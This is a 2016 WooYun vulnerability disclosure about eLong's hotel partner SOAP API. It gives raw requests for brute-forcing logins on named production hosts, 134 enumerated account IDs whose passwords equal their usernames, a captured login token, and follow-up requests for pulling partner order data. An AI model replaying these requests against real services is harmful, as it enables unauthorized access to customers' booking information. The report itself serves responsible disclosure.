当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169510

漏洞标题:艺龙旅行网某VIP接口可导致订单敏感信息泄露

相关厂商:艺龙旅行网

漏洞作者: 艺术家

提交时间:2016-01-13 08:57

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:重要敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-13: 细节已通知厂商并且等待厂商处理中
2016-01-13: 厂商已经确认,细节仅向厂商公开
2016-01-23: 细节向核心白帽子及相关领域专家公开
2016-02-02: 细节向普通白帽子公开
2016-02-12: 细节向实习白帽子公开
2016-02-27: 细节向公众公开

简要描述:

住哪网都用的这个接口泄露的是与其他酒店对接的接口,用来从其他酒店获取订单信息
有了这些信息,可以自己写个脚本去调用这个接口来取回去哪儿在其他酒店的所有订单

详细说明:

两个接口:
http://114-svc.elong.com/NorthBoundService/V1.1/NorthBoundAPIService.asmx?WSDL
http://hotelwsqq.vip.elong.com/NorthBoundService/V1.1/NorthBoundAPIService.asmx?WSDL
这里两接口都是一样

2.jpg


1.jpg


LOGIN 这个接口可以暴力去枚举用户
LoginToken == 是登陆后的会返回的值

漏洞证明:

先来爆破一下密码:

POST /NorthBoundService/V1.1/NorthBoundAPIService.asmx HTTP/1.1
Content-Type: text/xml
SOAPAction: "http://elong.com/NorthBoundAPI/Login"
Content-Length: 1027
Host: 114-svc.elong.com
Connection: Close
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://elong.com/NorthBoundAPI/" xmlns:urn2="http://microsoft.com/wsdl/types/">
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<urn:Login>
<urn:loginRequest>
<urn:UserName>XXXXX</urn:UserName>
<urn:Password>XXXXX</urn:Password>
<urn:RequestHead>
<urn:LoginToken>${alpharand}</urn:LoginToken>
<urn:Language>english</urn:Language>
<urn:GUID>1</urn:GUID>
<urn:Version>1</urn:Version>
<urn:TestMode>1</urn:TestMode>
</urn:RequestHead>
</urn:loginRequest>
</urn:Login>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>


跑出134个客户信息

AP0000706
AP0001365
AP0002195
AP0003407
AP0005525
AP0005531
AP0008530
AP0009880
AP0016839
AP0019473
AP0001230
AP0001295
AP0001698
AP0014949
AP0018909
AP0020211
AP0012332
AP0012985
AP0014972
AP0014989
AP0017261
AP0018009
AP0019080
AP0019433
AP0019589
AP0019892
AP0021191
AP0017460
AP0009323
AP0016114
AP0019099
AP0019288
AP0019684
AP0019817
AP0019832
AP0020212
AP0020609
AP0021162
AP0021699
AP0000286
AP0000434
AP0000937
AP0001082
AP0001431
AP0001650
AP0001832
AP0001929
AP0006643
AP0006825
AP0007227
AP0008944
AP0008964
AP0009103
AP0010643
AP0010723
AP0011126
AP0011613
AP0011810
AP0011893
AP0012159
AP0012165
AP0012266
AP0012268
AP0012458
AP0012549
AP0012770
AP0012800
AP0013043
AP0013909
AP0014011
AP0014978
AP0015038
AP0015115
AP0015142
AP0015318
AP0015425
AP0015427
AP0015886
AP0015945
AP0015968
AP0015982
AP0016349
AP0016829
AP0017081
AP0017143
AP0017161
AP0017333
AP0017420
AP0017426
AP0017455
AP0018743
AP0018829
AP0018859
AP0018955
AP0018956
AP0018958
AP0019024
AP0019083
AP0019374
AP0019390
AP0019423
AP0019440
AP0019532
AP0019533
AP0019555
AP0019586
AP0019597
AP0019610
AP0019632
AP0019704
AP0019726
AP0019806
AP0019894
AP0020030
AP0020044
AP0020066
AP0020100
AP0020102
AP0020146
AP0020159
AP0020332
AP0020365
AP0020610
AP0021032
AP0021051
AP0021111
AP0021157
AP0021165
AP0021689
AP0021696
AP0021790
AP0021835


账号密码一样
会返回LOGINTOKEN值

3.jpg


拿到LOGINTOKEN值就可以去发请求去模拟elong的代理用户去取回其他酒店的所有订单。
构造下SOAP的请求:

POST /NorthBoundService/V1.1/NorthBoundAPIService.asmx HTTP/1.1
Content-Type: text/xml
SOAPAction: "http://elong.com/NorthBoundAPI/GetSupportCreditCardList"
Content-Length: 970
Host: hotelwsqq.vip.elong.com
Connection: Close
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://elong.com/NorthBoundAPI/" xmlns:urn2="http://microsoft.com/wsdl/types/">
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<urn:GetSupportCreditCardList>
<urn:request>
<urn:RequestHead>
<urn:LoginToken>bbb4b133-0a9f-427f-873b-53c47093f569</urn:LoginToken>
<urn:Language>CN</urn:Language>
<urn:GUID>1</urn:GUID>
<urn:Version>1</urn:Version>
<urn:TestMode>1</urn:TestMode>
</urn:RequestHead>
</urn:request>
</urn:GetSupportCreditCardList>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>


得到返回结果:

4.jpg


这里urn:GetHotelList 就是列举日期段的情况。
时间格式为2014-01-01
HotelId格式是:8位数 00101561,10101399,40101844

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  xmlns:xsd="http://www.w3.org/1999/XMLSchema"  xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"  xmlns:m0="http://tempuri.org/"  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://elong.com/NorthBoundAPI/" xmlns:urn2="http://microsoft.com/wsdl/types/">
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<urn:GetHotelList>
<urn:GetHotelListRequest>
<urn:GetHotelCondition>
<urn:CheckInDate>01/01/1967</urn:CheckInDate>
<urn:CheckOutDate>01/01/1967</urn:CheckOutDate>
<urn:CityId>San Francisco</urn:CityId>
<urn:HotelName>${alpharand}</urn:HotelName>
<urn:HotelId>555-666-0606</urn:HotelId>
<urn:RoomTypeID>1</urn:RoomTypeID>
<urn:RatePlanID>1</urn:RatePlanID>
<urn:StarCode>94102</urn:StarCode>
<urn:HighestRate>1</urn:HighestRate>
<urn:LowestRate>1</urn:LowestRate>
<urn:PositionModeCode>94102</urn:PositionModeCode>
<urn:StartLongitude>1</urn:StartLongitude>
<urn:StartLatitude>1</urn:StartLatitude>
<urn:EndLongitude>1</urn:EndLongitude>
<urn:EndLatitude>1</urn:EndLatitude>
<urn:Radius>1</urn:Radius>
<urn:DistrictId>1</urn:DistrictId>
<urn:CommercialLocationId>1</urn:CommercialLocationId>
<urn:LandmarkLocationID>USA</urn:LandmarkLocationID>
<urn:OpeningDate>01/01/1967</urn:OpeningDate>
<urn:DecorationDate>01/01/1967</urn:DecorationDate>
<urn:RoomAmount>1</urn:RoomAmount>
<urn:OrderByCode>94102</urn:OrderByCode>
<urn:OrderTypeCode>94102</urn:OrderTypeCode>
<urn:PageIndex>20</urn:PageIndex>
<urn:MaxRows>1</urn:MaxRows>
<urn:CurrencyCode>USD</urn:CurrencyCode>
</urn:GetHotelCondition>
<urn:RequestHead>
<urn:LoginToken>${alpharand}</urn:LoginToken>
<urn:Language>english</urn:Language>
<urn:GUID>1</urn:GUID>
<urn:Version>1</urn:Version>
<urn:TestMode>1</urn:TestMode>
</urn:RequestHead>
</urn:GetHotelListRequest>
</urn:GetHotelList>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>


修复方案:

api访问用户名能改下密码,住哪网他密码都改过了

版权声明:转载请注明来源 艺术家@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2016-01-13 16:16

厂商回复:

感谢白帽子!

最新状态:

暂无


漏洞评价:

评价